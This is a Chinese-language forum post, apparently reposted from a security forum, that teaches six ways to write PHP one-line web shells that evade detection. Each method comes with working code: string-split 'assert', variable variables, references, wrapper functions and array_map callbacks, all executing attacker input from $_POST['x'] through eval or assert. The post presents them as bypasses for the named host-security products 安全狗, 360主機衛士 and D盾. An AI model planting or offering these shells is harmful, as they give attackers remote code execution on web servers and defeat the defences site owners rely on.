這個絕對原創！ + 首發！


個人認為免殺大致分為這幾個方面：


1.關鍵字拆分。

         比如assert，可以寫成 'a'.'ss'.'e'.'r'.'t'這樣。

2.可變變數、引用、可變函式。

        可變變數  比如$a=$_POST['x'];$b='a';@eval($$b);

        引用  比如$a=$_POST['x'];$b=&$a;@eval($b);

        可變函式  比如$a='a'.'ss'.'e'.'r'.'t';$a($_POST['x']);

3.新增其他程式碼。

         新增其他程式碼  比如  if(empty($a))

                                       {
                                              $a=$_POST['x'];
                                       }

                                                  @eval($a);

4.函式替換。

        使用其他函式，比如eval可以使用assert替換。

5.封裝到新的函式中。

       新定義一個函式，使其封裝到新函式中。

       function test($a){   //定義一個名為test的函式，並使用$a接受引數

               eval($a);

}

        test($_POST['x']);

6.函式回撥。

       使用其他函式進行呼叫，並執行。

       如：array_map('a'.'s'.'se'.'r'.'t',array($_POST['x']));

詳細教程 + 測試結果（安全狗+360主機衛士+D盾）  請看視訊教程。

視訊教程下載地址：

本文來源地址：http://bbs.ichunqiu.com/thread-8964-1-1.html?from=bjy